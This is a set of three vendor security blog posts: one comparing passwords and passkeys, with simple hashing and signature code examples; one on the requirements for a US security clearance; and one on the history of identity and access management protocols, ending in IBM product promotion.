Passwords, passkeys and familiarity bias
https://securityintelligence.com/posts/passwords-passkeys-familiarity-bias/ (Tue, 23 Apr 2024)

As passkey (passwordless authentication) adoption proceeds, misconceptions abound. There appears to be a widespread impression that passkeys may be more convenient and less secure than passwords. The reality is that they are both more secure and more convenient — possibly a first in cybersecurity.

Most of us could be forgiven for not realizing passwordless authentication is more secure than passwords. Thinking back to the first couple of use cases I was exposed to — a phone operating system (OS) and a banking app — there was an implied emphasis on convenience rather than security.

Until very recently, hardly any of the services I’ve used communicated its benefits in terms of greater security. Plenty of services compel customers to reauthenticate with their password periodically to allow for continued logins using biometrics. This completely misses the point.

A vague sense of passkeys’ convenience being more relevant than their security is one thing. An impression that they’re actually less secure is another.

This recent LinkedIn poll by Auth0 compelled me, in part, to write this piece.

The fact that the extra security benefits come only third in the poll is striking. My colleague Jeff Crume has recorded two excellent videos on the topic here and here.

I’m taking a slightly different tack. Before allaying concerns with the new thing, I intend to flip the question around.

Why do we unduly (or even blindly) trust the security status quo?

Many IT leaders and engineers remember the earlier days of cloud adoption when cagey executives placed more burden of proof on big cloud providers for security and resiliency than they did on their own server cabinets housed in leaky janitors’ closets.

Putting the spotlight on the implication that the incumbent thing is automatically good has always been a favorite exercise of mine.

The fields of cognitive psychology and behavioral economics have studied several interrelated, overlapping phenomena relevant here. The godfathers of these fields, Daniel Kahneman and Amos Tversky, postulated the availability heuristic, whereby the most easily recalled things are erroneously judged to be the most common or most likely true.

A close spin-off of this heuristic is the familiarity heuristic. In one study, subjects were shown a list containing fewer, but more famous, female names alongside more numerous non-celebrity male names. The familiarity of the celebrity names led subjects to believe that female names were more frequent in the deck.

But the phenomenon that best fits our considerations here is Robert Zajonc’s mere-exposure effect. As fascinating as it is scary, his body of work describes robust evidence that liking/disliking is what really drives our decisions, with cognition playing a startlingly minor role the majority of the time. This effect, in turn, can be hacked simply by repeated exposure to a stimulus.

More insidiously, Zajonc demonstrated that low-level, less noticeable stimuli can get under our radars and cause us to like something via feelings of familiarity without our being conscious of it. More recent scholars of the lineage appear to support the assertion that usually, very little cognition is involved in forming attachments or aversions, with familiarity and repetition being the greatest contributors to them.

In light of this, it’s easy to see what fuels the dynamic whereby a lie told often enough becomes truth. This tendency can cause us to put misplaced trust in the commonplace as a false corollary to our suspicion of the novel.

Nassim Taleb rightly points out in his discussion of the Lindy effect that the tried, the tested and the longstanding are usually those very things for good reason, but that shouldn’t blind us to their weaknesses.

As a result of all these factors, people would likely remain wary of passkeys even if services communicated their enhanced security benefits. To that end, let’s compare how passwords and passkeys work and examine which is more secure.

How passwords work

First, let’s take a quick look at password creation, storage and authentication.

When a user creates an account and defines a password, the password is fed through a one-way hashing algorithm such as SHA-256. Only the resulting hash value is stored, allowing the service to verify passwords without the provider ever storing the password or knowing what it is.

To illustrate, let’s take the passwords “MySecurePassword123” and “MysecurePassword123” (the difference being the s for “secure” in the latter is lowercase).

See how radically different their hash values are:

  • MySecurePassword123 -> 1a5b06de7c27f493f0b246de9ab71dc35fc2171c38dc4c2b54f37e065a85e6f5
  • MysecurePassword123 -> d3f05a7223df23f4295a7e3be9a6f64c1f9bf5b90068b8e4a1b5e0e0440bb594
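
To see this in action, here is a minimal Python sketch of how such digests are computed; changing a single character flips the entire output:

    import hashlib

    for pw in ("MySecurePassword123", "MysecurePassword123"):
        # SHA-256 is deterministic: the same input always yields the same digest,
        # but any change to the input produces a radically different one
        print(pw, "->", hashlib.sha256(pw.encode()).hexdigest())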

Let’s continue with the example “MySecurePassword123.” To ensure that two users with the same password don’t end up with the same hash value, a string of random characters is generated and prepended to the password the user defines before hashing. This random string is known as a “salt,” and the technique as “salting.”

Let’s step through the process:

  • Original Password: MySecurePassword123
  • Generate Salt: \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06
  • Combine with Password:
    • \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06MySecurePassword123
    • (or \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06 + MySecurePassword123)
  • Hashed combination Salt+Password:
    • 35f3b09d68e4c0059d06d2b259c21dd67c5b33a520ff2b1980ad5dcafc764de1

This final hashed combination, along with the salt value generated at registration time, is what finally gets stored:

  • Salt: \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06
  • Hashed combination Salt+Password:
    • 35f3b09d68e4c0059d06d2b259c21dd67c5b33a520ff2b1980ad5dcafc764de1

For each authentication, the saved string of salt is retrieved, added to the beginning of the password entered by the user, fed through the same hashing algorithm and checked against the hash value stored in the directory.

This means a user entering “MySecurePassword123” as their password will have the stored salt value added to the beginning every time and always end up with the same hashed combination value.
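
Here is a minimal sketch of that register-and-verify cycle in Python. The parameters are illustrative; production systems should prefer a purpose-built password hashing scheme such as bcrypt or Argon2 over a single round of SHA-256:

    import hashlib
    import hmac
    import os

    def register(password: str) -> tuple[bytes, str]:
        salt = os.urandom(16)  # random salt generated at registration time
        hashed = hashlib.sha256(salt + password.encode()).hexdigest()
        return salt, hashed  # both are stored; the password itself never is

    def verify(password: str, salt: bytes, stored_hash: str) -> bool:
        candidate = hashlib.sha256(salt + password.encode()).hexdigest()
        return hmac.compare_digest(candidate, stored_hash)  # constant-time comparison

    salt, stored = register("MySecurePassword123")
    print(verify("MySecurePassword123", salt, stored))  # True
    print(verify("MysecurePassword123", salt, stored))  # False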

The main drawback is that users still need to transmit their passwords over the internet every single time. Not only that, passwords can be stolen outright or cracked by brute force, credential stuffing or dictionary attacks.

Now, let’s compare this with passkeys.

How passkeys work

To put the most important information first, passkey authentication is based on a protocol called Fast Identity Online 2 (FIDO2). Its headline security benefit is that it negates the need to transmit credentials over the internet by sending pieces of cryptography instead. Also, because of its use of private and public keys, it leaves hardly anything to hack or crack, as we’ll see.

Let’s take a look at the typical process whereby a user enrolls their device for biometric authentication with Google by creating a passkey and then authenticating with it.

 

  1. The user registers a fingerprint, face or PIN with a FIDO-enabled device’s OS for use during local authentication later. A hash of this biometric or PIN credential data is stored in a secure, partitioned hardware component on the device known as a Secure Element or Trusted Execution Environment.

  2. As part of creating a passkey for Google login, the FIDO-enabled device generates a private and public key pair conceptually similar to the ones used in HTTPS communications. The public key is sent to the service with which the passkey is being registered. The private key is kept in the same secure hardware cordon with the biometric credential hash.

  3. The next time Google receives a login request from this username, it sends a challenge to the FIDO-enabled device.

  4. The FIDO-enabled device authenticates the user locally by scanning their face or fingerprint.

  5. If the biometric matches, the FIDO-enabled device sends a digital signature generated with the private key created when registering with Google in Step 2. Google can authenticate this challenge-response if the signature verifies with the public key because only the holder of that private key could have generated that signature.

FIDO combines biometric verification with cryptographic paradigms that have long secured network communications to achieve both increased security and increased convenience. All that ever gets transmitted over the internet are public keys, challenges and digital signatures: pieces of cryptography that confirm authentication between devices and servers.
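
To make the challenge-response of steps 3 through 5 concrete, here is a minimal Python sketch using the cryptography library. It illustrates only the signature mathematics, not the actual FIDO2/WebAuthn message formats, and in a real passkey the private key never leaves the device’s secure hardware:

    import os
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import ec

    # Registration (step 2): the device generates a key pair; only the public key is shared
    private_key = ec.generate_private_key(ec.SECP256R1())
    public_key = private_key.public_key()

    # Login (step 3): the service issues a random challenge
    challenge = os.urandom(32)

    # Steps 4-5: after a successful local biometric match, the device signs the challenge
    signature = private_key.sign(challenge, ec.ECDSA(hashes.SHA256()))

    # Server side: verification succeeds only if the matching private key produced the signature
    public_key.verify(signature, challenge, ec.ECDSA(hashes.SHA256()))  # raises InvalidSignature on failure
    print("challenge-response verified")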

For a technical discussion of how FIDO protects against phishing, read this blog post by our veteran IAM engineer Shane Weeden.

Reach out to your local IBM identity technical specialist to find out just how doable it is to embed passkeys into your customer-facing websites and apps, or roll out within your enterprise!

Obtaining security clearance: Hurdles and requirements
https://securityintelligence.com/articles/obtaining-security-clearance-hurdles-requirements/ (Tue, 16 Apr 2024)

As security moves closer to the top of the operational priority list for private and public organizations, jobs that require a security clearance are increasingly commonplace. Security clearance is a prerequisite for a wide range of roles, especially those related to national security and defense.

Obtaining that clearance, however, is far from simple. The process often involves scrutinizing one’s background, financial history and even personal character. Let’s briefly explore some of the hurdles, expectations and requirements of obtaining a clearance.

Jobs that typically require security clearance

When you think of security clearance, government positions almost always come to mind. However, working in a cleared space is also a requirement for many roles within private organizations that contract with the government.

These positions are wide-ranging in industry and type and include:

  • Federal government and military jobs
  • Cybersecurity roles
  • Positions within intelligence agencies such as the CIA and FBI

Ultimately, any job requiring access to national security information mandates a security clearance. Examples range from executive-level positions to non-sensitive jobs like custodial staff, librarians and IT system administrators, depending on the level of classified information handled.

How long does it take to obtain clearance?

The time required to gain security clearance can vary significantly, often taking anywhere from a few months to over a year. The waiting period is determined by the depth of investigation required, which corresponds to the clearance level needed for the job.

While some applicants may receive interim security clearances to start their jobs sooner, final approval can be lengthy, especially if additional information is needed or there are backlogs in processing applications.

Potential hurdles in the clearance process

Obtaining security clearance isn’t supposed to be easy, and the process is designed to ensure that only the most trustworthy individuals have access to sensitive information.

Here are a few key challenges applicants might face:

Citizenship

A fundamental requirement for obtaining a security clearance is U.S. citizenship. Non-citizens are generally ineligible for clearance.

Financial history

An applicant’s financial history is a crucial part of the security clearance process. Issues like excessive debt, bankruptcy or a history of not meeting financial obligations can raise red flags about susceptibility to bribery or financial coercion.

Criminal record

A criminal record, depending on the nature and severity of the offenses, can be a significant barrier to obtaining a security clearance. Felonies, domestic violence convictions and other serious crimes can disqualify an applicant. Even minor offenses can be problematic if they indicate a pattern of risky behavior.

Drug use

Past drug use, even with marijuana, remains a contentious issue in the security clearance process. Despite the legalization of marijuana for medicinal or recreational use in many states, federal law still classifies it as an illegal substance. Agencies like the FBI require applicants to have abstained from marijuana use for at least three years before applying. The policy reflects concerns about judgment, reliability and the potential for blackmail. The evolving legal landscape around marijuana use presents a complex challenge for both applicants and agencies, especially as society shifts toward greater acceptance of cannabis.

Personal conduct and character

The security clearance process thoroughly examines an applicant’s personal conduct and character. Allegiance to foreign entities, misuse of technology or information and even sexual behavior are factors that could make one susceptible to blackmail and impact one’s general reliability.

Mental health

While mental health conditions do not automatically disqualify someone from obtaining a security clearance, how an individual manages their condition is essential. Untreated mental health issues that impact judgment and reliability or could lead to unpredictable behavior may raise concerns.

Working in a cleared space

Obtaining a security clearance is critical for individuals seeking employment in positions requiring access to classified information. While the process is comprehensive and can be daunting, understanding the expectations, requirements and potential hurdles can prepare applicants for what lies ahead. As societal attitudes and laws (particularly regarding drug use) continue to evolve, the criteria for security clearances may also adapt.

However, the core objective remains: ensuring individuals entrusted with national security information are thoroughly vetted and deemed reliable and trustworthy.

For those working in a cleared world, approaching the process with a healthy dose of patience, transparency and a thorough understanding will be incredibly helpful.

From federation to fabric: IAM’s evolution
https://securityintelligence.com/posts/identity-and-access-management-evolution/ (Tue, 05 Mar 2024)

In the modern day, we’ve come to expect that our various applications can share our identity information with one another. Most of our core systems federate seamlessly and bi-directionally. This means that you can quite easily register and log in to a given service with the user account from another service or even invert that process (technically possible, not always advisable). But what is the next step in our evolution towards greater interoperability between our applications, services and systems?

Identity and access management: A long evolution

Identity and access management (IAM) has evolved into a sprawling field of separate but interrelated processes. 

Even before the recent pandemic, both the users of our tech stacks and the servers that host their applications were becoming more and more dispersed and scattered. The pandemic only served to hyper-accelerate that trend. 

As Gartner’s Cybersecurity Chief of Research Mary Ruddy stated recently, “Digital security is reliant on identity whether we want it to be or not. In a world where users can be anywhere and applications are increasingly distributed across datacenters in the multi-cloud… identity and access is the control plane.”

Add to this the fact that most cybersecurity functions score about 2.5 on Gartner’s five-point maturity scale and we see the usual tech dynamic of convenience forging ahead as security struggles to keep pace. 

To see how these patches of user databases and applications can be stitched together into a united whole and allow for risk and context-based access control across the board, we will explore how identity and access interoperability have evolved from federation standards and protocols until now and how this is evolving forward into a cohesive identity fabric. 

It’s time to learn from the past, evaluate the present and, of course, prepare for the future of IAM.

Past: A history of federation

Dropping into the timeline around the year 1995 lands us in a time when the green shoots of identity interoperability were just starting to show.  

Around this time, twelve years and several threads of directory (or user database) research and development culminated in the emergence of the Lightweight Directory Access Protocol (LDAP) version 3. This standard became the basis for Netscape Directory Server in 1996, OpenLDAP in 1998 and the now-ubiquitous Microsoft Active Directory in 2000.

The standard was initially optimized for read rather than write operations and was designed to allow client apps with very limited computing available (less than 16MB RAM and 100 MHz CPU) to query and authenticate users quickly. By achieving this low-overhead functionality, LDAP quickly became the de facto authentication protocol for internet services. 
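
As a rough sketch of the kind of low-overhead bind-and-search operation LDAP was optimized for, here is an example using the Python ldap3 library (the server and entry names are hypothetical):

    from ldap3 import Server, Connection

    server = Server("ldap://directory.example.com")  # hypothetical directory host

    # A "bind" authenticates the user by distinguished name and password
    conn = Connection(
        server,
        user="uid=jdoe,ou=people,dc=example,dc=com",
        password="UserPassword123",
        auto_bind=True,  # raises an exception if authentication fails
    )

    # Read-optimized lookup of the user's entry and selected attributes
    conn.search("dc=example,dc=com", "(uid=jdoe)", attributes=["cn", "mail"])
    print(conn.entries)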

Inside the integrated Microsoft (MS) estate, Active Directory authenticated credentials against an LDAP directory and granted access to the operating system (OS) and any applications to which a user was entitled. 

Outside the MS estate, single sign-on had to be achieved by reverse proxy servers that authenticated users (usually via LDAP) in a holding pen before redirecting them into the various systems to which they were entitled. Under the hood, this approach tended to combine LDAP, 302 HTTP redirects, and identity information injected into HTTP headers, with cookies used as session tokens. This Web Access Management (WAM) paradigm was effective but somewhat crude and varied greatly from app to app. 

Now that a relatively universal authentication protocol was established, the lack of a standardized way to land users in applications post-authentication, along with their user, session or account attributes, became evident. In addition, session tokens based on cookies were only viable intra-domain, not inter-domain. Authorization was even clunkier: specific endpoints/URLs within applications had to be HTTP-redirected to the auth server, which, in turn, checked LDAP attributes before allowing the user to see a page or take an action.

SAML 2.0: A circle of trust

By the mid-2000s, threads of research and development (R&D) were coming to fruition, with WS-Federation, Liberty Alliance’s ID-FF 1.1 and the Organization for the Advancement of Structured Information Standards (OASIS) Security Assertion Markup Language (SAML) 1.1 being the standout candidates. The latter two, along with Shibboleth, converged, and OASIS ratified SAML 2.0 in March 2005.

The concept was to create a circle of trust between a user, a directory, and an application. Administrators on both the application and directory sides could exchange signing certificates to create trust between their two systems.

In an identity-provider-initiated flow, directories can redirect authenticated users into an application from an application launchpad. However, in a service-provider-initiated flow, users can attempt to log in to applications and (typically) be recognized by their email domain and redirected to their home directory to be authenticated there before being redirected back to the app. 

In both cases, users land in an application with a SAML assertion: a piece of XML data that encapsulates their identity data, any other custom fields or attributes (like account balance or shopping cart contents) and the X.509 signing certificate mentioned above.

SAML authorization is most commonly performed by landing a user into an application with roles already defined on the application side, such as standard, manager, developer or administrator. This typically means a user’s allowed/disallowed pages or actions are tied to their role type. 

In SAML 2.0, we finally had an identity federation technology, a standardized way for users from one directory to access multiple applications and (best of all) across different network domains. 

In identity federation, one system plays the role of a directory or user database, and the other system plays the role of the application being accessed, even if both systems are commonly thought of as apps. 

Below are diagrams showing how two of the most widely used enterprise systems that support SAML could federate one way or the other. In one, Salesforce acts as the identity provider (directory or user database) for accessing Azure, and in the other scenario, the roles are reversed. The point is to illustrate how the federation uses combinations of LDAP and SAML to allow users to access a service with their accounts from another service.

Scenario 1

 

Key:

  1. The user chooses an option to sign in to Azure with their Salesforce account.
  2. Azure redirects the user to Salesforce for authentication.
  3. The user’s credentials are authenticated via LDAP against Salesforce’s directory.
  4. Salesforce sends a signed SAML assertion containing the user’s data to Azure to log them in.

Scenario 2

 

Key:

  1. The user chooses an option to sign in to Salesforce with their Azure account.
  2. Salesforce redirects the user to Azure for authentication.
  3. The user’s credentials are authenticated via LDAP against Azure’s directory.
  4. Azure sends a signed SAML assertion containing the user’s data to Salesforce to log them in.

The consumer computing revolution

Beyond the enterprise, the release of iOS in 2007 and Android in 2008 saw an explosion in consumer computing. 

Consider this statistic: in 2010, 37 percent of households owned a computer, but by 2014, 37 percent of individuals owned a smartphone. Across the two mobile OSes in 2012 alone, roughly 1.3 billion new apps shipped, with about 35 billion downloads distributed across them.

Client-side applications became extremely lightweight — mere viewing and input panes — with the vast majority of the logic, data, and computing residing on the server and injected in over the internet.

The number of application programming interfaces (APIs) mushroomed to cater to a population that increasingly demanded their apps and services be able to share their data with one another, particularly to allow for subscribing to a service with their accounts from another service.

R&D into an open identity standard for consumer computing had been underway at Twitter and Google from around 2006 to 2007. During these conversations, experts realized that a similar need existed for an open standard for API access delegation. How could one application grant a certain amount of access to another without sharing credentials (which, in any case, would grant total access)?

As Eran Hammer-Lahav explains in his guide to OAuth, “Many luxury cars today come with a valet key. It is a special key you give the parking attendant and, unlike your regular key, will not allow the car to drive more than a mile or two… Regardless of what restrictions the valet key imposes, the idea is very clever. You give someone limited access to your car with a special key while using your regular key to unlock everything.”

How does OAuth work?

OAuth was the framework that emerged to solve this problem. It allows users to share data without sharing passwords.

Let’s take a look at what happens on the backend when a photo printing service allows you to share your pictures from an online storage platform instead of requiring you to upload them from your local machine.

Below is an attempt to explain a nine-step OAuth authorization flow as simply as possible. Formal terms for the various parties involved are bracketed. In this process, a user shares images from their Dropbox account with Photobox, an online photograph printing and delivery service. As in the SAML relationships described earlier, admins from both platforms must establish a backend trust, here based on a client ID and client secret (instead of an X.509 certificate as in SAML); these can be thought of as Photobox’s username and password with Dropbox. The scenario leverages a third-party authorization service (often an IAM platform), though many websites or services implement their own authorization service.

  1. A user opts to share data from one service (data holder) with another service (data requester). The data requester contacts the data holder with a client ID and client secret.
  2. Data-holding service redirects the request to an authorization service.
  3. The authorization service contacts the user’s browser to have them log in and/or provide consent to share data with the data requester as required. 
  4. The user logs in and/or provides consent to share data, often specifying what data can or cannot be shared (scopes).
  5. The authorizer redirects back to the data requester with an authorization token.
  6. The data requester contacts the authorizer on the backend (not via the user’s browser) with the authorization token plus client ID and client secret.
  7. The authorizer responds with an access token specifying the scope of what may or may not be accessed.
  8. The data requester sends an access token to the data holder.
  9. The data holder responds to the data requester with the scoped content.
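
To ground steps 6 through 9, here is a minimal Python sketch of the backend token exchange using the requests library. All endpoints, IDs and secrets are hypothetical placeholders:

    import requests

    TOKEN_URL = "https://authorizer.example.com/oauth/token"   # hypothetical authorization service
    PHOTOS_URL = "https://dataholder.example.com/api/photos"   # hypothetical data holder API

    # Step 6: exchange the authorization token for an access token (backend call, not via the browser)
    token_response = requests.post(TOKEN_URL, data={
        "grant_type": "authorization_code",
        "code": "AUTHORIZATION_TOKEN_FROM_STEP_5",
        "client_id": "PHOTO_SERVICE_CLIENT_ID",
        "client_secret": "PHOTO_SERVICE_CLIENT_SECRET",
        "redirect_uri": "https://requester.example.com/callback",
    })
    access_token = token_response.json()["access_token"]  # step 7: scoped access token

    # Steps 8-9: present the access token to the data holder and receive the scoped content
    photos = requests.get(PHOTOS_URL, headers={"Authorization": f"Bearer {access_token}"})
    print(photos.status_code)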

SAML authorized users “in advance” by landing users into applications with a specified role, and those applications defined what different roles could or couldn’t do. OAuth allows for much more fine-grained authorization on a per-page or per-action basis. This reflects an expansion from role-based access to a more resource-based access control mentality that emphasizes the thing being accessed over who is doing the accessing.

Registration and authentication

But what about registering and authenticating users? Most people think of OpenID Connect (OIDC) as an extension of OAuth, which is optimized for authentication instead of authorization. OAuth itself, incidentally, appears less keen on this characterization:

“OAuth is not an OpenID extension and at the specification level, shares only a few things with OpenID — some common authors and the fact both are open specification in the realm of authentication and access control.”

While they are used for different purposes — OAuth to authorize, OIDC to authenticate — the fact is that an OIDC flow is an OAuth flow with the addition of identity tokens to the authorization and access tokens.

Let’s look at the flow behind the scenes in a scenario like the one below, where you can register or log in to Airbnb with your Apple ID.

 

  1. The user opts to log in to Airbnb with Apple ID.
  2. Airbnb sends a request to the Apple ID service containing Airbnb’s client ID and client secret configured by both platform admins. 
  3. The user authenticates against Apple ID’s directory.
  4. Apple ID sends an encoded identity JSON Web Token (JWT) to Airbnb that contains the user’s information. Airbnb can decode Apple’s identity token by using a public key. The user’s session is created.

Unlike the OAuth flow described earlier, the resource server/data holder and the authentication service here belong to one and the same organization, with Apple ID both holding the data and authorizing its sharing. Alternatively, a third-party IAM platform could be implemented to query an OpenID provider and authenticate against it.
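
As a minimal sketch of step 4 on the relying party’s side, here is how the identity token might be verified using the PyJWT library. In practice the provider’s public key is fetched from its published JWKS endpoint; all names here are illustrative:

    import jwt  # PyJWT

    def create_session_claims(id_token: str, provider_public_key) -> dict:
        # Verify the token's signature and audience before trusting any of its claims
        claims = jwt.decode(
            id_token,
            provider_public_key,
            algorithms=["RS256"],
            audience="RELYING_PARTY_CLIENT_ID",  # must match the client ID issued to the app
        )
        return {"user_id": claims["sub"], "email": claims.get("email")}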

The JSON Web Token

The emergence of the JSON Web Token (JWT) around 2013 was a crucial element in the evolution of identity federation and modern authentication. Essentially a JSON data format with added security features, it defined a secure and standardized format for signing, encrypting, decrypting, and transmitting identity data across domains.

JWTs consist of three parts:

  1. Header: Contains fields for the token type (JWT) and the cryptographic algorithm used for the signature in section three (commonly RS256, RSA with SHA-256, or HS256, HMAC with SHA-256). If services have opted to encrypt as well as sign the JWT, the encryption algorithm is also specified here.
  2. Payload: Contains the actual user information being transmitted, in key:value pairs.
  3. Signature: The header and payload are run through the cryptographic algorithm specified in the header, ensuring their integrity and authenticity.


Figure: A sample JWT, encoded and decoded, with a header specifying the type (JWT) and the signing algorithm used, a payload specifying a unique ID, a name and whether the user is an admin, and finally a signature section.
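
To illustrate the three-part structure, here is a minimal Python sketch that hand-builds an HS256-signed JWT with a payload like the one described above. Real applications should use a maintained library such as PyJWT; the secret and claims are illustrative:

    import base64
    import hashlib
    import hmac
    import json

    def b64url(data: bytes) -> str:
        # JWTs use unpadded, URL-safe base64
        return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps({"sub": "1234567890", "name": "John Doe", "admin": True}).encode())

    # Signature: HMAC-SHA256 over "header.payload" with a shared secret
    signing_input = f"{header}.{payload}".encode()
    signature = b64url(hmac.new(b"shared-secret", signing_input, hashlib.sha256).digest())

    print(f"{header}.{payload}.{signature}")  # header.payload.signature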

It’s worth noting that while OAuth implementations may issue authorization and/or access tokens in XML, simple JSON, or JWT formats, OpenID Connect mandates the use of JWTs for identity tokens to ensure the authenticity and integrity of personally identifiable information.

This wraps up the main identity federation and access protocols and frameworks. In most cases, it’s useful to think in terms of a user who wants to ‘come from’ some directory and ‘go to’ some application. The terms used in the different protocols vary but map reasonably well like this:

  Generic                                 | SAML                      | OIDC                  | OAuth
  User                                    | Principal/Subject         | End-User              | User
  Directory / Identity Source / Registry  | Identity Provider (IdP)   | OpenID Provider (OP)  | Service Provider
  Application                             | Service Provider (SP)     | Relying Party (RP)    | Consumer

System for Cross-Domain Identity Management (SCIM)

Outside of access management, one more crucial IAM protocol is worth mentioning. The System for Cross-Domain Identity Management (SCIM) is the most common protocol for identity management. It is used to execute remote creation (provisioning), updating and deletion of users and groups from within an identity platform. It is also extremely useful for allowing developers to build out self-service user journeys such as address/phone/payment updating or password resets. Essentially a REST API optimized for identity governance, it has become a relatively universal standard, with most large cloud platforms now having SCIM endpoints that will accept HTTP POST and PUT requests.

Figure: Typical remote user-create SCIM API call
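
In place of the original figure, here is a minimal sketch of what such a user-create call might look like in Python. The endpoint and token are hypothetical; the schema URN comes from the SCIM 2.0 core specification:

    import requests

    response = requests.post(
        "https://idp.example.com/scim/v2/Users",  # hypothetical SCIM endpoint
        headers={"Authorization": "Bearer ADMIN_API_TOKEN"},
        json={
            "schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"],
            "userName": "jdoe",
            "name": {"givenName": "Jane", "familyName": "Doe"},
            "emails": [{"value": "jdoe@example.com", "primary": True}],
            "active": True,
        },
    )
    print(response.status_code)  # 201 on success, with the new user's ID in the response body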

Present day: The state of identity and access management

The long march from LDAP to SAML, OAuth, OIDC and SCIM has seen profound evolution and interoperability in IAM. These protocols have done much to allow systems to lean on one another to authenticate users, authorize the sharing of resources, or agree on standardized ways to lift and shift user data.

As IBM’s Bob Kalka likes to say, “Identity and access is an amorphous blob that touches on everything.” There are several separate but related processes that IAM admins, engineers and architects must be concerned with. The tooling developed by vendors has grown up to service these processes. Let’s look at the main ones:

  1. Orchestrate user journeys across applications, directories and third-party services (like identity proofers) from the user interface (UI) backward down the stack. The web redirect is still one of the most basic units of work, as users get bounced around between systems to execute user journeys that call on multiple systems. This usually demands that IAM engineers understand front-end web/mobile development and vice versa.

  2. Consume identities from, or sync and provision (CRUD: create, read, update, delete) identities into, any number of identity sources of varying kinds.

  3. Control the provisioning, updating and deletion of your joiners, movers and leavers on the application side.

  4. Authenticate users into any number of target applications of varying kinds. Things are easier when applications have been built to modern federation specifications like SAML or OpenID Connect, which can receive identity and account data from directories in a standardized way. However, many organizations lack the resources to modernize the applications that do not support these protocols. Landing users into those applications securely, while populating them with identity or other account information as necessary (session creation), can be especially challenging.

  5. Perform adaptive or context-based access control across the estate. Access policies can be based on static conditional rules related to location, device, user/group attributes, or the pages or actions being accessed. Access management increasingly leverages machine-learning algorithms that profile usage patterns and raise a session’s risk score when it diverges significantly from those patterns. Once these ‘ifs’ are defined, admins can define ‘thens’ ranging from allowing the session, to requiring multi-factor authentication (MFA) or additional MFA, to blocking it, depending on the riskiness of the user’s session.

  6. Integrate IAM with the organization’s security operations (SecOps). Most cybersecurity organizations score only about 2.5 on Gartner’s five-point maturity scale for IAM. SecOps and IAM are indeed quite distinct specializations, but the low level of interoperability is surprising. At the very least, it should be taken for granted that your security information and event management (SIEM) system is consuming IAM logs. This convergence of disciplines is dubbed identity threat detection and response (ITDR).

  7. Control access to privileged systems like server operating systems and root accounts of cloud service providers. These privileged access management (PAM) systems should, at a minimum, vault credentials to those systems. More advanced practices include approval requests, session recording and credential heartbeats to detect whether credentials have been altered.

This is the point at which IAM stands today: a proliferation of tools, processes, and integrations. To add to that complexity, most organizations’ IAM terrains are fragmented, at least along workforce and consumer lines. There is just as often further fragmentation on a per-business unit, per-product offering, or per-budget basis.

Where can our efforts to further unify this control plane lead us?

Looking ahead: The identity fabric

Gartner refers to an identity fabric as “a system of systems composed of a blend of modular IAM tools.”

As a discipline, IAM is at a point somewhat reminiscent of the world of SecOps circa 2016. At that time, there were several distinct but interrelated subdisciplines within the Security Operations Centre (SOC). Detection, investigation, and response were perhaps the three main process specializations, as well as product categories. Endpoint detection and response, threat intelligence, and threat hunting were and are swim lanes unto themselves. It was in this context that the need for orchestration processes and SOAR tooling emerged to stitch all of this together.

Given the security ramifications at stake, the evolution toward greater cohesion in IAM must be maintained. This more unified approach is what underpins the identity fabric mentality.

If the identity fabric is a composable set of tools, the orchestration layer is the stitching that weaves them into a whole. It is important to think of orchestration as both a work process and a tool.

Therefore, an identity fabric constitutes any and all of the seven work processes an organization needs to carry out its use cases — plus an orchestration process. This is how the “centralized control and decentralized enablement” discussed by Gartner is achieved.

IBM tooling across the 7 IAM work processes

IBM’s mission within the IAM space is to allow organizations to connect any user to any resource.

We have, for some time, had the greatest breadth of IAM tools under one roof. We were also the first to offer a single platform that supported both runtime (access management) and administrative (identity governance) workloads in a single product. This product, Verify SaaS, also has the distinction of still being the only platform equally optimized for both workforce and consumer workloads. 

That we have tooling across all seven process categories is a unique differentiator. That we offer a single platform straddling five of those seven processes sets us apart even further.

Examining the seven work processes, here is a brief holistic outline of the toolbox:

1. Orchestration

Our new orchestration engine is now available as part of Verify SaaS. It allows you to easily build user journey UIs and use cases in a low-code/no-code environment. On the back end, you can orchestrate directories and applications of all kinds and easily integrate with third-party fraud, risk or identity-proofing tools.

2. Directory integration and federation

IBM’s on-premise directory is the first on the market to support containerized deployments. Virtual Directory functionality allows the consumption of identities from heterogeneous identity sources to present target systems with a single authentication interface. Directory Integrator boasts an unrivaled number of connectors and parsers to read identity records from systems or databases and write them into other required directories. 

3. Identity governance

IBM offers powerful and customizable identity governance platforms in SaaS or software form, as well as out-of-the-box connectors for all the major enterprise applications, along with host adaptors for provisioning into infrastructure operating systems. Additional modules are available for entitlement discovery, separation of duty analysis, compliance reporting, and role mining and optimization.

4. Modern authentication

IBM offers runtime access management platforms available as SaaS or software. Both support SAML and OpenID Connect. The software platform’s heritage is in web access management, so the base module is a reverse proxy server for pre-federation target apps. 

The IBM Application Gateway (IAG) is a special gem in our IAM toolbox. A novel combination of old and new technologies, it allows you to serve a lightweight reverse proxy out of a container. Users are authenticated via OIDC on the way in and passed to the target application via the reverse proxy on the way out, so it can front an application that doesn’t support federation. It can also enforce access policies within your custom application based on URL paths, hostnames and HTTP methods. Available at no extra cost with any Verify Access or Verify SaaS entitlement, it is now also available as a standalone component. The Application Gateway lets you modernize how your custom app is consumed without investing in the modernization of the app itself.

 

 

5. Adaptive access

Trusteer is IBM’s fraud detection solution. It ingests over 200 data criteria to risk score user behavior, such as timing, typing and mouse patterns, browser and OS information, and virtual machine (VM) detection. It can be deployed standalone within your front-end applications, and Verify Access and Verify SaaS can also leverage Trusteer’s machine learning algorithm to risk score a user session at authentication time.

6. Identity threat detection and response

In addition to the Verify products’ native threat detection capabilities, they can easily integrate with the IBM X-Force threat intelligence platform and other third-party risk services. This data can be leveraged to immediately reject common or compromised credentials or requests from known malicious IP addresses. 

7. Privileged access management

To round out the IAM toolbox, Verify Privilege provides credential vaulting and heartbeat, session launchers, and session recording for mission-critical infrastructure operating systems, databases and systems.

Embracing cohesive IAM solutions

In the spirit of composability, IBM offers virtually every kind of IAM tool you could need, along with the orchestration engine that can stitch your identity estate into a cohesive fabric. They are all designed to interoperate with other directories, applications, access managers, or identity governors you may currently have deployed. The unique proposition is that we can provide what is missing, whatever that may be.

